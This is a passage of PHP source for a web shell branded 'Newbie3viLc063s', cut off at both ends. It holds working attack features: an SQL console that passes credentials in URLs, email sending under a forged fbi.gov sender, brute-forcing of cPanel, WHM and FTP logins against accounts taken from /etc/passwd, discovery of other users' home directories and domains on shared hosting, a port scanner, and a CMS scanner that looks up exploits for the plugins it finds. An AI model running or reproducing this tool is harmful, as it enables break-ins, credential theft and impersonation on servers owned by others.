  868.                                         <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  869.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  870.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  871.                                     </form>
  872.                                 </div> ";
  873.                             $columns = array();
  874.                             $msg = "<table class=\"explore\" style=\"width:99%;\">";
  875.                             $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  876.                             while(list($column) = @mysql_fetch_row($hasil))
  877.                                 {
  878.                                 $msg .= "<th>$column</th>"; $kolum = $column;
  879.                                 }
  880.                             $msg .= "</tr>";
  881.                             $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  882.                             list($total) = mysql_fetch_row($hasil);
  883.                             if(isset($_GET['z'])) $page = (int) $_GET['z'];
  884.                             else $page = 1;
  885.                             $pagenum = 100;
  886.                             $totpage = ceil($total / $pagenum);
  887.                             $start = (($page - 1) * $pagenum);
  888.                             $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  889.                             while($datas = @mysql_fetch_assoc($hasil))
  890.                                 {
  891.                                 $msg .= "<tr>";
  892.                                 foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  893.                                 $msg .= "</tr>";
  894.                                 }
  895.                             $msg .= "</table>";
  896.                             $head = "<div style=\"padding:10px 0 0 6px;\">
  897.                                     <form action=\"?\" method=\"get\">
  898.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  899.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  900.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  901.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  902.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  903.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  904.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  905.                                         <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  906.                                         Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  907.                             for($i = 1;$i <= $totpage;$i++)
  908.                                 {
  909.                                 $head .= "<option value=\"".$i."\">".$i."</option>";
  910.                                 if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  911.                                 }
  912.                             $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  913.                             $msg = $msgq.$head.$msg;
  914.                         }
  915.                     elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  916.                         {
  917.                         $db = $_GET['db'];
  918.                         $query = magicboom($_GET['sqlquery']);
  919.                         $msg = "<div style=\"width:99%;padding:0 10px;\">
  920.                                 <form action=\"?\" method=\"get\">
  921.                                     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  922.                                     <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  923.                                     <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  924.                                     <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  925.                                     <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  926.                                     <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  927.                                     <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  928.                                     <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  929.                                     <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  930.                                 </form>
  931.                             </div> ";
  932.                         @mysql_select_db($db);
  933.                         $querys = explode(";",$query);
  934.                         foreach($querys as $query)
  935.                             {
  936.                             if(trim($query) != "")
  937.                                 {
  938.                                 $hasil = mysql_query($query);
  939.                                 if($hasil)
  940.                                     {
  941.                                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  942.                                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  943.                                     $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  944.                                     for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  945.                                     $msg .= "</tr>";
  946.                                     for($i=0;$i<@mysql_num_rows($hasil);$i++)
  947.                                         {
  948.                                         $rows=@mysql_fetch_array($hasil);
  949.                                         $msg .= "<tr>";
  950.                                         for($j=0;$j<@mysql_num_fields($hasil);$j++)
  951.                                             {
  952.                                             if($rows[$j] == "") $dataz = "&nbsp;";
  953.                                             else $dataz = $rows[$j];
  954.                                             $msg .= "<td>".$dataz."</td>";
  955.                                             }
  956.                                         $msg .= "</tr>";
  957.                                         }
  958.                                     $msg .= "</table>";
  959.                                     }
  960.                                 else
  961.                                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  962.                                 }
  963.                             }
  964.                         }
  965.                     else
  966.                         {
  967.                         $query = "SHOW PROCESSLIST;\n
  968.                             SHOW VARIABLES;\n
  969.                             SHOW STATUS;";
  970.                         $msg = "<div style=\"width:99%;padding:0 10px;\">
  971.                             <form action=\"?\" method=\"get\">
  972.                                 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  973.                                 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  974.                                 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  975.                                 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  976.                                 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  977.                                 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  978.                                 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  979.                                 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  980.                                 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  981.                             </form>
  982.                             </div> ";
  983.                         $dbs = array();
  984.                         $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  985.                         $hasil = @mysql_list_dbs($con);
  986.                         while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  987.                         @sort($dbs);
  988.                         foreach($dbs as $db)
  989.                             {
  990.                             $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  991.                             }
  992.                         $msg .= "</table>";
  993.                         }
  994.                     @mysql_close($con);
  995.                     }
  996.                 else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  997.                 echo $msg;
  998.                 }
  999.             else
  1000.                 {
  1001.                 ?>
  1002.                 <form action="?" method="get">
  1003.                 <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  1004.                 <input type="hidden" name="x" value="mysql" />
  1005.                 <table class="tabnet" style="width:300px;">
  1006.                     <tr>
  1007.                         <th colspan="2">Connect to mySQL server</th>
  1008.                     </tr>
  1009.                     <tr>
  1010.                         <td>&nbsp;&nbsp;Host</td>
  1011.                         <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  1012.                     </tr>
  1013.                     <tr>
  1014.                         <td>&nbsp;&nbsp;Username</td>
  1015.                         <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  1016.                     </tr>
  1017.                     <tr>
  1018.                         <td>&nbsp;&nbsp;Password</td>
  1019.                         <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  1020.                     </tr>
  1021.                     <tr>
  1022.                         <td>&nbsp;&nbsp;Port</td>
  1023.                         <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  1024.                     </tr>
  1025.                 </table>
  1026.                 </form>
  1027.                 <?php
  1028.                 }
  1029.             }
  1030.         elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
  1031.             {
  1032.             if(isset($_POST['mail_send']))
  1033.                 {
  1034.                 $mail_to = $_POST['mail_to'];
  1035.                 $mail_from = $_POST['mail_from'];
  1036.                 $mail_subject = $_POST['mail_subject'];
  1037.                 $mail_content = magicboom($_POST['mail_content']);
  1038.                 if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  1039.                     { $msg = "email sent to $mail_to"; }
  1040.                 else $msg = "send email failed";
  1041.                 }
  1042.             ?>
  1043.             <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  1044.                 <table class="cmdbox">
  1045.                     <tr>
  1046.                         <td>
  1047.                             <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
  1048.                         </td>
  1049.                     </tr>
  1050.                     <tr>
  1051.                         <td>
  1052.                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to
  1053.                         </td>
  1054.                     </tr>
  1055.                     <tr>
  1056.                         <td>   
  1057.                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="Newbie3viLc063s0@fbi.gov" name="mail_from" />
  1058.                             &nbsp; from
  1059.                         </td>
  1060.                     </tr>
  1061.                     <tr>
  1062.                         <td>
  1063.                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
  1064.                         </td>
  1065.                     </tr>
  1066.                     <tr>
  1067.                         <td>
  1068.                             &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  1069.                         </td>
  1070.                     </tr>
  1071.                     <tr>
  1072.                         <td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  1073.                         </td>
  1074.                     </tr>
  1075.                 </table>
  1076.             </form>
  1077.             <?php
  1078.             }
  1079.         elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  1080.             {  
  1081.             ?>
  1082.                 <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  1083.             <?php
  1084.             //bruteforce
  1085.             @ini_set('memory_limit', 999999999999);
  1086.             $connect_timeout=5;
  1087.             @set_time_limit(0);
  1088.             $pokeng     = $_REQUEST['submit'];
  1089.             $hn         = $_REQUEST['users'];
  1090.             $crew       = $_REQUEST['passwords'];
  1091.             $pasti      = $_REQUEST['sasaran'];
  1092.             $manualtarget   = $_REQUEST['target'];
  1093.             $bisa       = $_REQUEST['option'];
  1094.             if($pasti == ''){
  1095.                 $pasti = 'localhost';
  1096.             }
  1097.             if($manualtarget == ''){
  1098.                 $manualtarget = 'http://localhost:2082';
  1099.             }
  1100.  
  1101. function get_users()
  1102. {
  1103.     $users = array();
  1104.     $rows=file('/etc/passwd');
  1105.     if(!$rows) return 0;   
  1106.     foreach ($rows as $string)
  1107.     {
  1108.         $user = @explode(":",$string);
  1109.         if(substr($string,0,1)!='#') array_push($users,$user[0]);
  1110.     }
  1111.     return $users;
  1112. }
  1113.  
  1114. if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  1115. else
  1116.     {
  1117.     print " <div align='center'>
  1118.         <form method='post' style='border: 1px solid #000000'><br><br>
  1119.         <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  1120.             <tr>
  1121.                 <td>
  1122.                     <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  1123.                     <div align='center'><br>
  1124.                     <TABLE style='BORDER-COLLAPSE: collapse'
  1125.                         cellSpacing=0
  1126.                         borderColorDark=#666666
  1127.                         cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  1128.                         <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  1129.                         </tr>
  1130.                     </table>
  1131.                     <p align='center'>
  1132.                     <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  1133.     foreach($users as $user) { echo $user."\n"; }
  1134.     print"</textarea>
  1135.         <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  1136.         <br>
  1137.         <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  1138.         <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  1139.         <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  1140.         <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  1141.         </td></tr></table></td></tr></form><p align= 'left'>";
  1142.     }
  1143. ?>
  1144. <?php
  1145.  
  1146. function manual_check($anjink,$asu,$babi,$lonte){
  1147.     $ch = curl_init();
  1148.     curl_setopt($ch, CURLOPT_URL, "$anjink");
  1149.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1150.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1151.     curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1152.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1153.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1154.     $data = curl_exec($ch);
  1155.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1156.     elseif ( curl_errno($ch) == 0 ){
  1157.         print "<b>[ Newbie3viLc063s0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1158.         }
  1159.     curl_close($ch);
  1160. }
  1161.  
  1162.  
  1163. function ftp_check($link,$user,$pswd,$timeout){
  1164.     $ch = curl_init();
  1165.     curl_setopt($ch, CURLOPT_URL, "ftp://$link");
  1166.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1167.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1168.     curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1169.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
  1170.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1171.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1172.     $data = curl_exec($ch);
  1173.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
  1174.     elseif ( curl_errno($ch) == 0 ){
  1175.         print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  1176.         }
  1177.     curl_close($ch);
  1178. }
  1179.  
  1180. function cpanel_check($anjink,$asu,$babi,$lonte){
  1181.     $ch = curl_init();
  1182.     curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
  1183.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1184.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1185.     curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1186.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1187.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1188.     $data = curl_exec($ch);
  1189.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1190.     elseif ( curl_errno($ch) == 0 ){
  1191.         print "<b>[ Newbie3viLc063s@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1192.         }
  1193.     curl_close($ch);
  1194. }
  1195.  
  1196. function whm_check($anjink,$asu,$babi,$lonte){
  1197.     $ch = curl_init();
  1198.     curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
  1199.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1200.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1201.     curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1202.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1203.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1204.     $data = curl_exec($ch);
  1205.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1206.     elseif ( curl_errno($ch) == 0 )
  1207.         {
  1208.         print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1209.         }
  1210.     curl_close($ch);
  1211. }
  1212.    
  1213. if(isset($pokeng) && !empty($pokeng))
  1214.     {
  1215.     $userlist = explode ("\n" , $hn );
  1216.     $passlist = explode ("\n" , $crew );
  1217.     print "<b>[ " . TITLE . "  ]# </b> ATTACK...!!! </font></b><br>";
  1218.     foreach ($userlist as $asu)
  1219.         {
  1220.         $_user = trim($asu);
  1221.         foreach ($passlist as $babi )
  1222.             {
  1223.             $_pass = trim($babi);
  1224.             if ($bisa == "manual")
  1225.                 { manual_check($manualtarget,$_user,$_pass,$lonte); }
  1226.             if($bisa == "ftp")
  1227.                 { ftp_check($pasti,$_user,$_pass,$lonte); }
  1228.             if ($bisa == "cpanel")
  1229.                 { cpanel_check($pasti,$_user,$_pass,$lonte); }
  1230.             if ($bisa == "whm")
  1231.                 { whm_check($pasti,$_user,$_pass,$lonte); }
  1232.             }
  1233.         }
  1234.     }
  1235. }
  1236.  
  1237. //bruteforce
  1238.  
  1239. elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
  1240.     {  
  1241.     ?>
  1242.     <form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
  1243.     <?php
  1244.  
  1245.     //radable public_html
  1246.     echo '<html><head><title>Newbie3viLc063s Cpanel Finder</title></head><body>';
  1247.     ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1248.     set_time_limit(0);
  1249.     ###################
  1250.     @$passwd = fopen('/etc/passwd','r');
  1251.     if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1252.     $pub = array();
  1253.     $users = array();
  1254.     $conf = array();
  1255.     $i = 0;
  1256.     while(!feof($passwd))
  1257.     {
  1258.         $str = fgets($passwd);
  1259.         if ($i > 35)
  1260.             {
  1261.             $pos = strpos($str,':');
  1262.             $username = substr($str,0,$pos);
  1263.             $dirz = '/home/'.$username.'/public_html/';
  1264.             if (($username != ''))
  1265.                 {
  1266.                 if (is_readable($dirz))
  1267.                     {
  1268.                     array_push($users,$username);
  1269.                     array_push($pub,$dirz);
  1270.                     }
  1271.                 }
  1272.             }
  1273.         $i++;
  1274.     }
  1275.    
  1276.     ###################
  1277.     echo '<br><br>';
  1278.     echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1279.     echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br />";
  1280.     echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  1281.     foreach ($users as $user)
  1282.         {
  1283.         $path = "/home/$user/public_html/";
  1284.         echo "<a href='?y&#61;$path' target='_blank' style='text-shadow:0px 0px 10px #12E12E; font-weight:bold; color:#FF0000;'>$path</a><br>";
  1285.         }
  1286.     echo "<br><br><br>";
  1287.     echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."<br />";
  1288.     echo "[+] Complete...\n"."<br />";
  1289.     echo '<br><br></b>
  1290.     </body>
  1291.     </html>';
  1292.    
  1293.     }
  1294.  
  1295.    
  1296. elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1297.     {  
  1298.     ?>
  1299.     <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1300.     <?php
  1301.  
  1302.     //readable public_html
  1303.    
  1304.     echo "<br><br>";
  1305.     $file = @implode(@file("/etc/named.conf"));
  1306.     if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1307.     preg_match_all("#named/(.*?).db#",$file ,$r);
  1308.     $domains = array_unique($r[1]);
  1309.    
  1310.     function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1311.    
  1312.     check();
  1313.    
  1314.     echo "<table align=center border=1 class='tabnet' width=59% cellpadding=5>
  1315.              <tr><th colspan=2>[+] Here We Have : [<font face=calibri size=4 style=color:#FF0000>".count($domains)."</font>] Listed Domains In localhost.</th></tr>
  1316.              <tr>
  1317.              <td><b>List Of Users</b></td>
  1318.              <td><b><font style=color:#0015FF;>List Of Domains</b></td>
  1319.              </tr>";
  1320.    
  1321.     foreach($domains as $domain)
  1322.            {
  1323.            $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1324.            echo "<tr>
  1325.            <td><a href='http://www.$domain' target='_blank' style='text-shadow:0px 0px 10px #CC2D4B; font-weight:bold; color:#FF002F;'>$domain</a></td>
  1326.            <td>".$user['name']."</td>
  1327.            </tr>";
  1328.            }
  1329.    
  1330.     echo "</table>";
  1331.     //radable public_html
  1332.     }
  1333.    
  1334. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-scanner'))
  1335. {  
  1336. ?>
  1337. <form action="?y=<?php echo $pwd; ?>&amp;x=port-scanner" method="post">
  1338.  <?php
  1339.  
  1340. echo '<br><br><center><br><b>Port Scanner</b><br>';
  1341. $start = strip_tags($_POST['start']);
  1342. $end = strip_tags($_POST['end']);
  1343. $host = strip_tags($_POST['host']);
  1344.  
  1345. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1346. for($i = $start; $i<=$end; $i++){
  1347.         $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1348.         if($fp){
  1349.                 echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
  1350.         }
  1351.         flush();
  1352.         }
  1353. }else{
  1354.  
  1355. echo '
  1356. <input type="hidden" name="y" value="phptools">
  1357. Host:<br />
  1358. <input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost"/><br />
  1359. Port start:<br />
  1360. <input type="text" style="color:#FF0000;background-color:#000000" name="start" value="0"/><br />
  1361. Port end:<br />
  1362. <input type="text" style="color:#FF0000;background-color:#000000" name="end" value="5000"/><br />
  1363. <input type="submit" style="color:#FF0000" value="Scan Ports" />
  1364. </form></center>';
  1365. }
  1366.     }
  1367.    
  1368. elseif(isset($_GET['x']) && ($_GET['x'] == 'string-encode'))
  1369. {  
  1370. ?>
  1371. <form action="?y=<?php echo $pwd; ?>&amp;x=string-encode" method="post">
  1372. <?php
  1373.  
  1374. /*
  1375.   Simple STRING TO HASH
  1376.   Code by Altenator IWnet
  1377. */
  1378.  
  1379. echo "<center><br><br><form method='post'>
  1380. Insert STRING Here : <input type='text' style='color:#FF0000;background-color:#000000' name='hash_input' value='' /><br><br>
  1381. <input type='submit' name='submit_hash' style='color:#FF0000;background-color:#000000' value='Encode' /><br><br>";
  1382.  
  1383. if (isset($_POST['submit_hash'])) {
  1384.     if (isset($_POST['hash_input'])) {
  1385.         $hash_input = $_POST['hash_input'];
  1386.         }
  1387.  
  1388. if ($hash_input=="") {  // show error if nothing inserted in input box
  1389.     echo 'Nothing Inserted!';
  1390. } else {
  1391.     if (isset($hash_input)) {
  1392.         foreach (hash_algos() as $hash_setoption) {    // set to use all hash function
  1393.         $calculate_hash = hash($hash_setoption, $hash_input, false); // calculate all hash and declare variable
  1394.         echo "<table border='1'><tbody>";
  1395.         echo "<tr><th><font style='color:#9F7CEB'>$hash_setoption</font></th><th><font style='color:#5BC740'>$calculate_hash</font></th></tr>";   // output
  1396.     }
  1397.     }
  1398.     echo '</tbody></table></center>';
  1399. }
  1400. }
  1401. }
  1402.  
  1403. elseif(isset($_GET['x']) && ($_GET['x'] == 'cms-scanner'))
  1404. {
  1405. ?>
  1406. <form action="?y=<?php echo $pwd; ?>&amp;x=cms-scanner" method="post">
  1407.  
  1408. <?php
  1409. echo "<html>
  1410. <body>
  1411. <p align='center'>&nbsp;</p>
  1412. <p align='center'>&nbsp;</p>
  1413. <p align='center'>&nbsp;</p>
  1414. <p align='center'><font size='4'>1337 Multiple CMS Scaner Online v0.4 (0!IIIV) | T0olKit By : KedAns-Dz</font></p><br>
  1415. <form method='POST'>
  1416. <p align='center'><input type='text' name='site' class='inputz' size='65' value='127.0.0.1'><input type='submit' class='inputzbut' value='Scan..'></p>
  1417. </form><center>";
  1418.  
  1419. @set_time_limit(0);
  1420. @error_reporting(0);
  1421.  
  1422. function check_exploit($cpmxx){
  1423.  
  1424. $link ="http://packetstormsecurity.org/search/files/?q=$cpmxx";
  1425.  
  1426. $result = @file_get_contents($link);
  1427.  
  1428. if (eregi("No Results Found",$result))  {
  1429.  
  1430. echo"<td>Not Found</td><td><a href='http://www.google.dz/#hl=en&q=download+$cpmxx'>Download</a></td></tr>";
  1431.  
  1432. }else{
  1433.  
  1434. echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";
  1435.  
  1436. }
  1437. }
  1438.  
  1439. /* Joomla Conf */
  1440. function check_com($url){
  1441.  
  1442. $source = @file_get_contents($url);
  1443.  
  1444. preg_match_all('{option,(.*?)/}i',$source,$f);
  1445. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1446. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1447.  
  1448. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1449.  
  1450. $coms=array();
  1451.  
  1452. if(count($arz)==0){ echo "<tr><td colspan=3>[ Joomla ] ...Nothing Found !</td></tr>";}
  1453.  
  1454. foreach(array_unique($arz) as $x){
  1455. $coms[]=$x;
  1456. }
  1457.  
  1458. foreach($coms as $comm){
  1459.  
  1460. echo "<tr><td>$comm</td>";
  1461. check_exploit($comm);
  1462. }
  1463.  
  1464. }
  1465.  
  1466. /* WordPress Conf */
  1467.  
  1468. function get_plugins($url){
  1469.  
  1470. $source = @file_get_contents($url);
  1471.  
  1472. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  1473.  
  1474. $arz=array_unique($f[1]);
  1475.  
  1476. if(count($arz)==0){ echo "<tr><td colspan=3>[ Wordpress ] ...Nothing Found !</td></tr>";}
  1477.  
  1478. foreach($arz as $plugin){
  1479.  
  1480. echo "<tr><td>$plugin</td>";
  1481.  
  1482. check_exploit($plugin);
  1483.  
  1484. }
  1485.  
  1486. }
  1487.  
  1488. /**************************************************************/
  1489. /* Nuke's Conf */
  1490.  
  1491. function get_numod($url){
  1492.  
  1493. $source = @file_get_contents($url);
  1494.  
  1495. preg_match_all('{?name=(.*?)/}i',$source,$f);
  1496. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  1497. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  1498.  
  1499. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1500.  
  1501. $cpm=array();
  1502.  
  1503. if(count($arz)==0){ echo "<tr><td colspan=3>[ Nuke's ] ...Nothing Found !</td></tr>";}
  1504.  
  1505. foreach(array_unique($arz) as $x){
  1506.  
  1507. $cpm[]=$x;
  1508. }
  1509.  
  1510. foreach($cpm as $nmod){
  1511.  
  1512. echo "<tr><td>$nmod</td>";
  1513.  
  1514. check_exploit($nmod);
  1515.  
  1516. }
  1517.  
  1518. }
  1519.  
  1520. /*****************************************************/
  1521. /* Xoops Conf */
  1522.  
  1523. function get_xoomod($url){
  1524.  
  1525. $source = @file_get_contents($url);
  1526.  
  1527. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  1528.  
  1529. $arz=array_merge($f[1]);
  1530.  
  1531. $cpm=array();
  1532.  
  1533. if(count($arz)==0){ echo "<tr><td colspan=3>[ Xoops ] ...Nothing Found !</td></tr>";}
  1534.  
  1535. foreach(array_unique($arz) as $x){
  1536.  
  1537. $cpm[]=$x;
  1538. }
  1539.  
  1540. foreach($cpm as $xmod){
  1541.  
  1542. echo "<tr><td>$xmod</td>";
  1543.  
  1544. check_exploit($xmod);
  1545.  
  1546. }
  1547.  
  1548. }
  1549.  
  1550. /**************************************************************/
  1551.  
  1552. function sec($site){
  1553. preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
  1554. if(eregi("www",$sites[0][0])){
  1555. return $site=str_replace("index.php","",$sites[0][0]);
  1556. }else{
  1557. return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
  1558. }}
  1559.  
  1560. $npages = 50000;
  1561.  
  1562. if ($_POST)
  1563. {
  1564.   $ip = trim(strip_tags($_POST['site']));
  1565.   $npage = 1;
  1566.   $allLinks = array();
  1567.  
  1568.  
  1569.    while($npage <= $npages)
  1570.   {
  1571.  
  1572.   $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
  1573.  
  1574.  
  1575.     if ($x)
  1576.     {
